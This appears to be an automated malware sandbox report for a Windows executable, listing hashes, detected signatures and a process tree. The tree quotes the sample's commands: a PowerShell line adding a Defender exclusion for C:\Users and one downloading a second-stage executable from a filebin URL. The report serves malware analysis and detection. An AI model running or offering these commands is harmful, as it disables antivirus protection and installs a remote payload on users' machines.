Analysis
- max time kernel: 4294180s
- max time network: 121s
- platform: windows7_x64
- resource: win7-20220310-en
- submitted: 22/03/2022, 14:51

Static task: static1
Behavioral task: behavioral1
Sample: 6239dfea99c25.exe
Resource: win7-20220310-en
0 signatures
0 seconds
General
- Target: 6239dfea99c25.exe
- Size: 154KB
- MD5: b5946ff13e7698c7e2f26491885ddaab
- SHA1: 5a30f2c32c05cdf7ea86a916bb7b529c647e56b4
- SHA256: b6814794481de92b96493819677c96320d500487b82fd6eb72018faba8a831eb
- SHA512: 4b296cc73916bf75bc1ab0feadf076b1794a88ba83663c1803e3342b14ff223b85f4d27b86c244088aa8f3eef309b1948f0db9ff71775f7d6e7759ca76b6dca7

Score: 6/10
Malware Config
Signatures
- Adds Run key to start application (2 TTPs, 2 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | 6239dfea99c25.exe
  Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | 6239dfea99c25.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid | Process
  1268 | powershell.exe
  1792 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 1268 | powershell.exe
  Token: SeDebugPrivilege | 1792 | powershell.exe
- Suspicious use of WriteProcessMemory (9 IoCs)
  description | pid | Process | procid_target
  PID 1748 wrote to memory of 536 | 1748 | 6239dfea99c25.exe | 27
  PID 1748 wrote to memory of 536 | 1748 | 6239dfea99c25.exe | 27
  PID 1748 wrote to memory of 536 | 1748 | 6239dfea99c25.exe | 27
  PID 536 wrote to memory of 1268 | 536 | cmd.exe | 29
  PID 536 wrote to memory of 1268 | 536 | cmd.exe | 29
  PID 536 wrote to memory of 1268 | 536 | cmd.exe | 29
  PID 536 wrote to memory of 1792 | 536 | cmd.exe | 30
  PID 536 wrote to memory of 1792 | 536 | cmd.exe | 30
  PID 536 wrote to memory of 1792 | 536 | cmd.exe | 30
Processes
- Image: C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe"
  PID: 1748
  Signatures: Adds Run key to start application; Suspicious use of WriteProcessMemory
  - Image: C:\Windows\system32\cmd.exe
    Command line: cmd /c bruhad.bat
    PID: 536
    Signatures: Suspicious use of WriteProcessMemory
    - Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -command "Add-MpPreference -ExclusionPath "C:\Users"
      PID: 1268
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -command "Invoke-WebRequest -uri https://filebin.net/ezig0gb1jw3em8r7/looad.exe -o looad.exe"
      PID: 1792
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken